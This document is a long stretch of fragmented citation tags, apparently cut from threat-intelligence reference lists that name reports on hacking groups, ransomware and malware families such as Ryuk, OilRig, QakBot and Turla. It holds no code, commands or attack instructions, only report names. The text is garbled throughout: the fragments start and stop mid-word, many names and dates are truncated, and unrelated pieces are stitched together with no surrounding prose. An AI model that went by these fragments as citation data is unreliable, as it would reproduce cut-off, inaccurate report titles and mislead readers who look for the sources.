017),(Citation: Mandiant ROADSWEEP August 2022),(Citation: Github UACMe),(Citation: ESET InvisiMole June 2020),(Citation: ESET InvisiM

Ryuk's Return October 2020),(Citation: Red Canary Hospital Thwarted Ryuk October 2020),(Citation: Palo Alto OilRig May 2016),(Citation:

n: ESET InvisiMole June 2018),(Citation: McAfee Bankshot),(Citation: FireEye admin@338),(Citation: Palo Alto Comnie),(Citation: UCF STIG

on: Certfa Charming Kitten January 2021),(Citation: RedCanary RaspberryRobin 2022),(Citation: Secureworks COBALT DICKENS September
018),(Citation: Medium Anchor DNS July 2020),(Citation: Cybereason Oceanlotus May 2017),(Citation: Palo Alto OilRig May 2016),(Citation

itation: Unit 42 MechaFlounder March 2019),(Citation: FoxIT Wocao December 2019),(Citation: Binary Defense Emotes Wi-Fi Spreader),(C

2024),(Citation: Kaspersky Turla),

r Technical Annex April 2017),(Citation: Symantec Gallmaker Oct 2018),(Citation: CrowdStrike IceApple May 2022),(Citation: apt41_dcsocy

group-ib_redcurl2),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Unit42 Redaman January 2019),(Citation: ESET Gamaredon

s May 2017),(Citation: Cybereason Chaes Nov 2020),(Citation: Securelist MuddyWater Oct 2018),(Citation: Red Canary NETWIRE January 2
une 2021),(Citation: Kaspersky QakBot September 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: StarBlizzard),(Citation:

Oct 2018),(Citation: Symantec Seaduke 2015),(Citation: Talos Zeus Panda Nov 2017),(Citation: Mandiant No Easy Breach),(Citation: NCSC J

t Qakbot May 2021),(Citation: TrendMicro Confucius APT Feb 2018),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Microsoft Actinium F
8834-2.v1 TAINTEDSCRIBE MAY 2020),(Citation: Malwarebytes Pony April 2016),(Citation: Symantec Suckfly May 2016),(Citation: Dragos C
tion: McAfee Cuba April 2021),(Citation: Kroll RawPOS Jan 2017),(Citation: Cyberreason Anchor December 2019),(Citation: FireEye APT41 M

ot Nov 2018),(Citation: Bitdefender Naikon April 2021),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: ESET PLEAD Malware

ber 2019),(Citation: JPCERT ChChes Feb 2017),(Citation: Check Point APT34 April 2021),(Citation: Lunghi Iron Tiger Linux),(Citation: FireEye
itation: FireEye Maze May 2020),(Citation: US-CERT NotPetya 2017),(Citation: Cynet Ragnar Apr 2020),(Citation: Joint CSA AvosLocker Mar

Securelist Calisto July 2018),(Citation: Red Canary SocGholish March 2024),(Citation: Palo Alto MoonWind March 2017),(Citation: Avira Mu

Cybereason Soft Cell June 2019),(Citation: ESET Machete July 2019),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Frankenstein
tion: FireEye FIN7 Oct 2019),(Citation: Google TAG COLDRIVER January 2024),(Citation: NCC Group TA505),(Citation: Microsoft Moonstone

erc 2023),(Citation: CSM Elderwood Sept 2012),(Citation: Gigamon Berserk Bear October 2021),(Citation: Talos Transparent Tribe May 202

on: FireEye POSHSPY April 2017),(Citation: Kaspersky Sodin July 2019),(Citation: ESET Kobalos Feb 2021),(Citation: FireEye FIN6 April 2016)
Unit42 RDAT July 2020),(Citation: GitHub Sliver Encryption),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: FireEye APT3
Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: FireEye Clandestine Fox),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citati

itation: FoxIT Wocao December 2019),(Citation: Unit 42 Rocke January 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: Securelist A
(Citation: MSTIC NOBELIUM May 2021),(Citation: RiskIQ Cobalt Jan 2018),(Citation: Eset Ramsay May 2020),(Citation: Uptycs Confucius AP

34 Webinar Dec 2017),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Dell TG-3390),

FoxIT Wocao December 2019),(Citation: McAfee Gold Dragon),(Citation: Unit 42 Gamaredon February 2022),(Citation: ESET Sednit USBSte
Cedar March 2015),(Citation: ESET InvisiMole June 2020),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: group-ib_redcurl1),(Cit

: CheckPoint Naikon May 2020),(Citation: CYBERCOM Iranian Intel Cyber January 2022),(Citation: Symantec Cicada November 2020),(Citati
on: Sophos Ragnar May 2020),(Citation: Trend Micro Trickbot Nov 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Un

t SpeakUp Feb 2019),(Citation: Cybereason Oceanlotus May 2017),(Citation: Symantec Seaduke 2015),(Citation: Mandiant No Easy Breach

Indrik November 2018),(Citation: ESET Gazer Aug 2017),(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020),(Citation: Mandia

on: Check Point Meteor Aug 2021),(Citation: Proofpoint TA505 Jan 2019),(Citation: Fortinet Metamorfo Feb 2020),(Citation: FireEye Metam
),(Citation: Unit42 Agrius 2023),(Citation: Crowdstrike Indrik November 2018),(Citation: Cybereason INC Ransomware November 2023),(Ci

keye),(Citation: Prevailion DarkWatchman 2021),(Citation: Trend Micro Daserf Nov 2017),(Citation: Secureworks BRONZE BUTLER Oct 2017
tinum Masquerade),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Unit42 Redaman January 2019),

es Wi-Fi Spreader),(Citation: ESET TeleBots Oct 2018),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: SentinelOne Aoqin Drago
ET Casbaneiro Oct 2019),(Citation: ESET Bad Rabbit),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: IBM Grandoreiro Ap

2021),(Citation: CERT-FR PYSA April 2020),(Citation: ESET Gelsemium June 2021),(Citation: ESET PipeMon May 2020),(Citation: Symantec N

addyWiper March 2022),(Citation: Intel 471 REvil March 2020),(Citation: SCILabs Malteiro 2021),(Citation: Cybereason Cobalt Kitty 2017),(C

n: ClearSky Pay2Kitten December 2020),(Citation: GitHub Pupy),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citati
May 2016 Mofang),(Citation: Kaspersky QakBot September 2021),(Citation: US-CERT TA18-074A),(Citation: McAfee Cuba April 2021),(Citati

kBack Malware Aug 2019),(Citation: Unit 42 NETWIRE April 2020),(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation: Bitdefe

Muddy Water March 2021),(Citation: Microsoft Prestige ransomware October 2022),(Citation: Threatpost Lizar May 2021),(Citation: apt41

ason Bumblebee August 2022),(Citation: BlackBerry Amadey 2020),(Citation: Cyberint Qakbot May 2021),(Citation: Microsoft Analyzing So

June 2019),(Citation: Trend Micro Emotet Jan 2019),(Citation: Unit 42 MuddyWater Nov 2017),(Citation: Cybereason Astaroth Feb 2019),

on: Cylance Dust Storm),(Citation: Latrodectus APR 2024),(Citation: Trend Micro TeamTNT),(Citation: FireEye HAWKBALL Jun 2019),(Citatio

e August 2018),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Trend Micro DRBControl February 2020),(Citation: Unit 42 Hildegard M

22),(Citation: Unit 42 DarkHydrus July 2018),(Citation: Secureworks IRON LIBERTY July 2019),(Citation: Proofpoint TA407 September 2019)

Micro njRAT 2018),(Citation: Unit42 Redaman January 2019),

ov 2021),(Citation: Unit 42 Valak July 2020),(Citation: Anomali Pirate Panda April 2020),(Citation: Cylance Dust Storm),(Citation: RiskIQ Cob
hor December 2019),(Citation: ESET OceanLotus),(Citation: Cylance Machete Mar 2017),(Citation: group-ib_redcurl2),(Citation: Proofpoint

ET August 2023),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Medium KONNI Jan 2020),(Citation: Symantec Inception Framewo
der April 2021),(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation: ESET Attor Oct 2019),(Citation: FoxIT Wocao December 2

tation),(Citation: Unit 42 IronNetInjector February 2021 ),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Microsoft FinFisher Ma

A PRC Critical Infrastructure February 2024),(Citation: Red Canary NETWIRE January 2020),(Citation: TrendMicro Patchwork Dec 2017),(Cita

rult Nov 2018),(Citation: FireEye APT34 Dec 2017),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Crowdstrike Indrik N
re Update May 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Unit42 Agrius 2023),(Citation: DFIR Phosphorus November 2021),(Citati
n: Symantec W32.Duqu),(Citation: Cycraft Chimera April 2020),(Citation: FireEye Shamoon Nov 2016),(Citation: Kaspersky Regin),(Citation:

on Nov 2016),(Citation: Unit42 Agrius 2023),(Citation: Talos Rocke August 2018),(Citation: Gigamon Berserk Bear October 2021),(Citation: C

tbrick Oct 2017),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: ESET Lazarus Jun 2020),(Citation: FireEye FIN7 April 201

: Microsoft Actinium February 2022),(Citation: ESET Gelsemium June 2021),(Citation: Github PowerShell Empire),(Citation: TrendMicro BKD
Jan 2019),(Citation: Microsoft GALLIUM December 2019),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: TrendMicro Trop

Bumblebee June 2022),(Citation: Microsoft DUBNIUM June 2016),(Citation: FireEye APT34 Dec 2017),(Citation: Talos Rocke August 2018),(

n TA505 April 2019),(Citation: IBM ZeroCleare Wiper December 2019),(Citation: DFIR Conti Bazar Nov 2021),(Citation: CrowdStrike Scatter
es LazyScripter Feb 2021),(Citation: Microsoft SIR Vol 19),(Citation: Symantec Bumblebee June 2022),(Citation: Gigamon Berserk Bear Octo

anary SocGholish March 2024),(Citation: Unit 42 Shamoon3 2018),(Citation: Talos MuddyWater Jan 2022),(Citation: ESET Dukes October 2

rt APT35 ProxyShell March 2022),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: ESET Carbon Mar 2017),(Citation: FireEye SUN

2020),(Citation: FireEye admin@338),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: BitDefender BADHATCH Mar 2021),(
Citation: Cybereason Soft Cell June 2019),(Citation: Secureworks Gold Prelude Profile),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation:

aq Jan 2010),(Citation: Kaspersky Lab SynAck May 2018),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Malwarebytes

n: FireEye APT41 March 2020),(Citation: Medium Anchor DNS July 2020),(Citation: SentinelOne Agrius 2021),(Citation: Talos TinyTurla Sept

ate 2018),(Citation: ESET EvasivePanda 2024),(Citation: FoxIT Wocao December 2019),(Citation: Lastline DarkHotel Just In Time Decryption
ation: Anomali Pirate Panda April 2020),(Citation: Unit 42 Valak July 2020),(Citation: Cylance Dust Storm),(Citation: IBM IcedID November

ober 2020),(Citation: US District Court Indictment GRU Oct 2018),(Citation: SentinelOne WinterVivern 2023),(Citation: Proofpoint TA416 E
bruary 2024),(Citation: Novetta-Axiom),(Citation: Cycraft Chimera April 2020),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: FireEye A

abs reversing run-only applescripts 2021),(Citation: Check Point APT34 April 2021),(Citation: 20 macOS Common Tools and Techniques),(C

works GOLD IONIC April 2024),(Citation: Sophos Maze VM September 2020),(Citation: Secureworks GandCrab and REvil September 2019),
e 2020),(Citation: ESET InvisiMole June 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Github UACMe)

to OilRig May 2016),(Citation: FireEye Ryuk and Trickbot January 2019),(Citation: Symantec Bumblebee June 2022),(Citation: Cycraft Chime

o Comnie),(Citation: UCF STIG Elevation Account Enumeration)

COBALT DICKENS September 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: Cylance Dust Storm)
Alto OilRig May 2016),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Check Point APT34 April 2021),(Citation: Symantec Remsec

nse Emotes Wi-Fi Spreader),(Citation: McAfee Gold Dragon),(Citation: Unit 42 Gamaredon February 2022),(Citation: FireEye FELIXROOT Ju

2022),(Citation: apt41_dcsocytec_dec2022),(Citation: Symantec MuddyWater Dec 2018),(Citation: Eset Ramsay May 2020),(Citation: FoxIT

9),(Citation: ESET Gamaredon June 2020),(Citation: FireEye MESSAGETAP October 2019),(Citation: ESET InvisiMole June 2020),(Citation: Sy

Red Canary NETWIRE January 2020),(Citation: Talos Zeus Panda Nov 2017),(Citation: Anomali Pirate Panda April 2020),(Citation: Mandiant
tation: StarBlizzard),(Citation: Talos Cobalt Strike September 2020),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: CrowdStrike Ca

Easy Breach),(Citation: NCSC Joint Report Public Tools),(Citation: Bitdefender Trickbot VNC module Whitepaper 2021),(Citation: FireEye A

Citation: Microsoft Actinium February 2022),(Citation: Crowdstrike Qakbot October 2020),(Citation: ThreatConnect Kimsuky September 20
May 2016),(Citation: Dragos Crashoverride 2018),(Citation: MoustachedBouncer ESET August 2023),(Citation: Symantec Darkmoon Aug 20
019),(Citation: FireEye APT41 March 2020),(Citation: ESET OceanLotus),(Citation: Symantec W32.Duqu),(Citation: Lunghi Iron Tiger Linux),(

Citation: ESET PLEAD Malware July 2018),(Citation: FireEye APT28),(Citation: FireEye APT37 Feb 2018),(Citation: Talos Group123),(Citation

Tiger Linux),(Citation: FireEye APT34 Dec 2017),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Antiy CERT Ramsay Ap
tion: Joint CSA AvosLocker Mar 2022),(Citation: Symantec WastedLocker June 2020),(Citation: SOCRadar INC Ransom January 2024),(Citatio

arch 2017),(Citation: Avira Mustang Panda January 2020),(Citation: Talos MuddyWater Jan 2022),(Citation: Symantec Catchamas April 201

,(Citation: Talos Frankenstein June 2019),(Citation: Rapid7 HAFNIUM Mar 2021),(Citation: CISA AR18-352A Quasar RAT December 2018),(C
itation: Microsoft Moonstone Sleet 2024),(Citation: FireEye APT10 Sept 2018),(Citation: Medium KONNI Jan 2020),(Citation: Medium S2W

os Transparent Tribe May 2021),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Proofpoint Operation Transparent Tribe March 2

ation: FireEye FIN6 April 2016),(Citation: Mandiant Cutting Edge Part 3 February 2024),(Citation: Bitdefender Sardonic Aug 2021),(Citation:
2023),(Citation: FireEye APT33 Guardrail),(Citation: ESET PipeMon May 2020),(Citation: NGLite Trojan),(Citation: Mandiant Suspected Tur
tation: group-ib_redcurl1),(Citation: trendmicro xcsset xcode project 2020),(Citation: CISA MAR SLOTHFULMEDIA October 2020),

Cicada November 2020),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: ATT Sidewinder January 2021),(Citation: DH
odules July 2019),(Citation: Unit 42 Hildegard Malware),(Citation: Symantec WastedLocker June 2020),(Citation: FireEye Metamorfo Apr 20

tion: Mandiant No Easy Breach),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Cylance Dust Storm),(Citation: Unit42 Ocea

E MAY 2020),(Citation: Mandiant ROADSWEEP August 2022),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: Dell TG-3390),(Citation

2020),(Citation: FireEye Metamorfo Apr 2018),(Citation: TrendMicro Taidoor),(Citation: Mandiant APT1),(Citation: Microsoft Holmium June
somware November 2023),(Citation: Group IB Ransomware September 2020),(Citation: FireEye WannaCry 2017),(Citation: SANS Conficke

orks BRONZE BUTLER Oct 2017),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: Symantec Daggerfly 2023),(Citation: Fire
tion: SentinelOne Aoqin Dragon June 2022),(Citation: Cybereason Kimsuky November 2020),(Citation: Palo Alto Shamoon Nov 2016),(Citati
,(Citation: IBM Grandoreiro April 2020),(Citation: Unit42 RDAT July 2020),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation

ay 2020),(Citation: Symantec Nerex May 2012),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: TrendMicro BKDR_URSNIF.SM

bereason Cobalt Kitty 2017),(Citation: RotaJakiro 2021 netlab360 analysis),(Citation: ESET Bad Rabbit),(Citation: Sogeti CERT ESEC Babuk M

tructure February 2024),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: FireEye APT39 Jan 2019),(Citation: PTSecurity Cobalt Grou
McAfee Cuba April 2021),(Citation: GitHub Pupy),(Citation: Bitdefender Trickbot March 2020),(Citation: CIRCL PlugX March 2013),(Citation:

bruary 2024),(Citation: Bitdefender Sardonic Aug 2021),(Citation: Kaspersky Regin),(Citation: Unit 42 PingPull Jun 2022),(Citation: FoxIT W

zar May 2021),(Citation: apt41_dcsocytec_dec2022),(Citation: FireEye FIN6 April 2016),(Citation: SecureWorks BRONZE UNION June 2017)

itation: Microsoft Analyzing Solorigate Dec 2020),(Citation: SentinelOne Valak June 2020),(Citation: MacKeeper Bundlore Apr 2019),(Citatio

bereason Astaroth Feb 2019),(Citation: TrendMicro Netwalker May 2020),(Citation: ATT Sidewinder January 2021),(Citation: FireEye FIN7

e HAWKBALL Jun 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: TrendMicro Tropic Trooper May 202

(Citation: Unit 42 Hildegard Malware),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Juniper IcedID June 2020),(Citation: Cybe

point TA407 September 2019),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Check Point APT35 CharmPower January 2022),(C
ust Storm),(Citation: RiskIQ Cobalt Nov 2017),(Citation: FireEye APT41 Aug 2019),(Citation: IBM IcedID November 2017),(Citation: Proofpoi
edcurl2),(Citation: Proofpoint TA505 Jan 2019),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Trellix Darkgate 2023),(Citation: Man

Symantec Inception Framework March 2018),(Citation: Symantec Shuckworm January 2022),(Citation: Bitdefender FunnyDream Campaig
tion: FoxIT Wocao December 2019),(Citation: McAfee REvil October 2019),(Citation: Threatpost New Op Sharpshooter Data March 2019),(C

itation: Microsoft FinFisher March 2018),(Citation: IBM MegaCortex),(Citation: TrendMicro Patchwork Dec 2017),(Citation: F-Secure BlackE

icro Patchwork Dec 2017),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: NCSC Joint Report Public Tools),(Citation: DFIR Ph

(Citation: Crowdstrike Indrik November 2018),(Citation: Sekoia Raccoon1 2022),(Citation: ESET InvisiMole June 2018),(Citation: GitHub SILE
phorus November 2021),(Citation: FireEye APT39 Jan 2019),(Citation: Malwarebytes DarkComet March 2018),(Citation: Github Koadic),(Ci
on: Kaspersky Regin),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: NCC Group APT15 Alive and Strong),(C

Bear October 2021),(Citation: Crowdstrike Indrik November 2018),(Citation: Palo Alto ARP),(Citation: Bitdefender Naikon April 2021),(Citati

Citation: FireEye FIN7 April 2017),(Citation: Red Canary Dridex Threat Report 2021),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation:

pire),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: Unit 42 Kazuar May 2017),(Citation: Trend Micro Daserf Nov 2017),(Citation: Volex
22),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: Guidepoint SUPERNOVA D

on: Talos Rocke August 2018),(Citation: wardle evilquest parti),(Citation: Check Point Meteor Aug 2021),(Citation: Mandiant ROADSWEEP A

(Citation: CrowdStrike Scattered Spider BYOVD January 2023),(Citation: Kaspersky Winnti April 2013),(Citation: FireEye APT41 Aug 2019),(C
n: Gigamon Berserk Bear October 2021),(Citation: Github Koadic),(Citation: group-ib_redcurl2),(Citation: Sophos Ragnar May 2020),(Citatio

itation: ESET Dukes October 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: McAfee Night Dragon),(Citation: Un

ar 2017),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Cylance Shaheen Nov 2018),(Citation: Unit 42 C0d0so0 Jan 201

ender BADHATCH Mar 2021),(Citation: SOCRadar INC Ransom January 2024),(Citation: Mandiant APT1),(Citation: Kaspersky Andariel Ranso
rrelwaffle Sep 2021),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Frankenstein June 2019),(Citation: ESET Casbaneiro Oct 2019

020),(Citation: Malwarebytes Dyreza November 2015),(Citation: ESET InvisiMole June 2018),(Citation: FireEye admin@338),(Citation: ESET

(Citation: Talos TinyTurla September 2021),(Citation: Symantec Hydraq Persistence Jan 2010),(Citation: SentinelLabs Metador Technical Ap

kHotel Just In Time Decryption Nov 2015),(Citation: CISA ComRAT Oct 2020),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(C
tation: IBM IcedID November 2017),(Citation: Proofpoint TA450 Phishing March 2024),(Citation: Talos Transparent Tribe May 2021),(Citati

,(Citation: Proofpoint TA416 Europe March 2022),(Citation: Cylance Machete Mar 2017),(Citation: group-ib_redcurl2),(Citation: Proofpoin
4 Dec 2014),(Citation: FireEye APT39 Jan 2019),(Citation: Secureworks GOLD SAHARA),(Citation: Mandiant APT29 Microsoft 365 2022),(Cita

mon Tools and Techniques),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Latrodectus APR 2024),(Citation: Unit42 OceanLotus 2017),(C

b and REvil September 2019),(Citation: SecureWorks WannaCry Analysis),(Citation: Mandiant FIN12 Oct 2021),(Citation: LogRhythm Wann
Github UACMe)

2022),(Citation: Cycraft Chimera April 2020),(Citation: CISA SoreFang July 2016),(Citation: IBM IcedID November 2017),(Citation: FireEye A

(Citation: Cylance Dust Storm),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: PWC Yello
1),(Citation: Symantec Remsec IOCs),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Lunghi Iron Tiger Linux),(Citation: fsec

Citation: FireEye FELIXROOT July 2018),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Securelist Octopus Oct 2018),(Citation: Microso

say May 2020),(Citation: FoxIT Wocao December 2019),(Citation: Radware Micropsia July 2018),(Citation: TrendMicro EarthLusca 2022),(C

iMole June 2020),(Citation: Symantec Cicada November 2020),(Citation: group-ib_redcurl1),(Citation: Sekoia Raccoon1 2022),(Citation: ES

pril 2020),(Citation: Mandiant No Easy Breach),(Citation: Latrodectus APR 2024),(Citation: Cylance Dust Storm),(Citation: FireEye APT41 Au
021),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: ClearSky MuddyWater Nov 2018),(Citation: Cyber Forensicator Silence J

per 2021),(Citation: FireEye APT41 Aug 2019),(Citation: ESET Turla PowerShell May 2019),(Citation: FireEye APT29),(Citation: DFIR Report

onnect Kimsuky September 2020),(Citation: Lazarus APT January 2022),(Citation: Lab52 WIRTE Apr 2019),(Citation: Secureworks BRONZE B
n: Symantec Darkmoon Aug 2005),(Citation: Gigamon BADHATCH Jul 2019),(Citation: FireEye APT10 Sept 2018),(Citation: Novetta Blockbu
tion: Lunghi Iron Tiger Linux),(Citation: Crowdstrike Indrik November 2018),(Citation: FireEye WannaCry 2017),(Citation: SANS Conficker),(

tion: Talos Group123),(Citation: Trend Micro Muddy Water March 2021),(Citation: Kaspersky Lyceum October 2021),(Citation: PWC Cloud H

itation: Antiy CERT Ramsay April 2020),(Citation: FireEye APT28),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Trend Micro M
Ransom January 2024),(Citation: Trend Micro Royal Linux ESXi February 2023),(Citation: Dragos EKANS),(Citation: ClearkSky Fox Kitten Feb

ymantec Catchamas April 2018),(Citation: FireEye FIN6 April 2016),(Citation: ESET Attor Oct 2019),(Citation: SecureWorks BRONZE UNION

Quasar RAT December 2018),(Citation: Proofpoint TA505 October 2019),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation
2020),(Citation: Medium S2W WhisperGate January 2022),(Citation: Accenture HyperStack October 2020),(Citation: ESET LightNeuron Ma

tion Transparent Tribe March 2016),(Citation: Secure List Bad Rabbit),(Citation: ESET Windigo Mar 2014),(Citation: ESET Buhtrap and Buran

Sardonic Aug 2021),(Citation: ESET Attor Oct 2019),(Citation: FoxIT Wocao December 2019),(Citation: CISA ComRAT Oct 2020),(Citation: S
tion: Mandiant Suspected Turla Campaign February 2023),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(C
MEDIA October 2020),

der January 2021),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Google Cloud APT41 2024),(Citation: FireEye APT
tion: FireEye Metamorfo Apr 2018),(Citation: CrowdStrike Putter Panda),(Citation: Trend Micro Muddy Water March 2021),(Citation: Drago

Storm),(Citation: Unit42 OceanLotus 2017),(Citation: FireEye APT41 Aug 2019),(Citation: FireEye HAWKBALL Jun 2019),(Citation: FireEye H

tation: Dell TG-3390),(Citation: ESET InvisiMole June 2018),(Citation: McAfee Bankshot),(Citation: ESET Kobalos Jan 2021),(Citation: ClearSk

ation: Microsoft Holmium June 2020),(Citation: Juniper IcedID June 2020),(Citation: Deep Instinct TA505 Apr 2019),(Citation: PTSecurity Co
017),(Citation: SANS Conficker),(Citation: FireEye FiveHands April 2021),(Citation: Mcafee Clop Aug 2019),(Citation: Crowdstrike DriveSlay

Daggerfly 2023),(Citation: FireEye CARBANAK June 2017),(Citation: Crowdstrike DNC June 2016),(Citation: KISA Operation Muzabi),(Citatio
Alto Shamoon Nov 2016),(Citation: Intrinsec Egregor Nov 2020),(Citation: ESET InvisiMole June 2020),(Citation: Unit42 Redaman January 20
LHOUETTE May 2023),(Citation: Anomali Static Kitten February 2021),(Citation: Symantec RAINDROP January 2021),(Citation: CERT-FR PYS

TrendMicro BKDR_URSNIF.SM),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: SentinelOne Valak

tion: Sogeti CERT ESEC Babuk March 2021),(Citation: BlackBerry Amadey 2020),(Citation: ATT QakBot April 2021),(Citation: Microsoft Actini

tation: PTSecurity Cobalt Group Aug 2017),(Citation: Symantec Suckfly May 2016),(Citation: ESET InvisiMole June 2020),(Citation: Cado Sec
PlugX March 2013),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Sophos BlackCat Jul 2022),(Citation: NCC Group Fivehands June 2021),

ll Jun 2022),(Citation: FoxIT Wocao December 2019),(Citation: Cybereason Royal December 2022),(Citation: CISA MAR-10292089-1.v2 TAID

ks BRONZE UNION June 2017),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: Symantec MuddyWater Dec 2018),(

per Bundlore Apr 2019),(Citation: ThreatConnect Kimsuky September 2020),(Citation: Symantec Buckeye),(Citation: iSight Sandworm Oct 2

2021),(Citation: FireEye FIN7 Aug 2018),(Citation: FireEye MuddyWater Mar 2018),(Citation: ESET Telebots Dec 2016),(Citation: GitHub In

Micro Tropic Trooper May 2020),(Citation: TrendMicro Lazarus Nov 2018),(Citation: FireEye FiveHands April 2021),(Citation: Talos Promet

dID June 2020),(Citation: Cybereason Clop Dec 2020),(Citation: Symantec Elderwood Sept 2012),(Citation: ESET Dukes October 2019),(Cita

CharmPower January 2022),(Citation: Group IB Silence Aug 2019),(Citation: Dell TG-3390),(Citation: Bitdefender LuminousMoth July 2021)
mber 2017),(Citation: Proofpoint TA450 Phishing March 2024),(Citation: Talos Transparent Tribe May 2021),(Citation: Unit 42 TA551 Jan 20
Darkgate 2023),(Citation: Mandiant APT1),(Citation: Trend Micro Muddy Water March 2021),(Citation: Microsoft Unidentified Dec 2018),(

efender FunnyDream Campaign November 2020),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Kaspersky ToddyCat June 2022),(Citation:
pshooter Data March 2019),(Citation: Kaspersky QakBot September 2021),(Citation: Microsoft SIR Vol 21),(Citation: NCSC-NL COATHANGE

017),(Citation: F-Secure BlackEnergy 2014),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Symantec Bumblebee June 2022),(Citation: Sym

Public Tools),(Citation: DFIR Phosphorus November 2021),(Citation: Riskiq Remcos Jan 2018),(Citation: FireEye APT41 Aug 2019),(Citation:

ne 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: FireEye APT28),(Citation: Trend Micro DRBControl February 2020),
8),(Citation: Github Koadic),(Citation: Cybereason INC Ransomware November 2023),(Citation: Cymmetria Patchwork),(Citation: DFIR Repo
up APT15 Alive and Strong),(Citation: SANS Conficker),(Citation: Cybereason Conti Jan 2021),(Citation: DFIR Ryuk 2 Hour Speed Run Novem

nder Naikon April 2021),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: BitDefender BADHATCH Mar 2021),(Citation: Syman

ent Tesla Aug 2020),(Citation: FireEye APT34 July 2019),(Citation: Sophos Maze VM September 2020),(Citation: Red Canary Qbot),(Citation

serf Nov 2017),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Sekoia R
on: Guidepoint SUPERNOVA Dec 2020),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: CISA AA21-200A APT40 July 2021),(Citation:

tion: Mandiant ROADSWEEP August 2022),(Citation: BlackBerry Bahamut),(Citation: Fortinet Metamorfo Feb 2020),(Citation: TrendMicro

on: FireEye APT41 Aug 2019),(Citation: Lunghi Iron Tiger Linux),(Citation: Check Point Black Basta October 2022),(Citation: Nicolas Falliere,
phos Ragnar May 2020),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: ClearSky Wilted Tulip July 2017),(Citation: Crowdstrike HuntRe

fee Night Dragon),(Citation: Unit42 BabyShark Feb 2019),(Citation: ESET Attor Oct 2019),(Citation: FoxIT Wocao December 2019),(Citation:

tion: Unit 42 C0d0so0 Jan 2016),(Citation: Talos Promethium June 2020),(Citation: Palo Alto Comnie),(Citation: ESET Industroyer),(Citation

tion: Kaspersky Andariel Ransomware June 2021),(Citation: Trend Micro Muddy Water March 2021),(Citation: RATANKBA),(Citation: Avira
